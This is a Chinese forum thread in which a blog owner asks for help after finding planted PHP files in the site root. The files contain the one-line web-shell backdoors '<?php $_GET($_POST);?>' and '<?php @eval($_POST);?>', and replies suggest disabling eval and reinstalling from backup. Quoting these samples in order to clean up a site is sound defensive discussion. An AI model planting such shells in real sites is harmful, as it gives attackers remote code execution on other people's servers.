SOS 求助,我的小站难道被针对了?
昨天发现被挂了代码后,修改了后台管理员密码和后台登陆路径。今晚发现网站的根目录有个helper.class.php的文件,晚上9点半刚生成的。我看饿了下代码是<?php $_GET($_POST);?> 这个好像是一句话 Gh0st 发表于 2017-10-26 23:18这个好像是一句话
:L这怎么弄上来的?晕。。。不知道哪里有漏洞。。。还没堵上 还有个 Uninstall.php里有
<?php @eval($_POST);?>
:L 禁用函数eval 估计你那源码里一堆洞了 刚刚nginx里启用访问日志access.log准备看看有没有什么可以得情况。。。之前都把日志关了。。哎。。 maro666 发表于 2017-10-26 23:49
估计你那源码里一堆洞了
:'(什么源码?我插件一个没用,就是博客的外观皮肤用了别人的。 20140727 发表于 2017-10-26 23:52
什么源码?我插件一个没用,就是博客的外观皮肤用了别人的。
皮肤里面洞才多 遍地洞啊。建议 备份数据库 程序重新覆盖一遍吧。
页:
[1]
2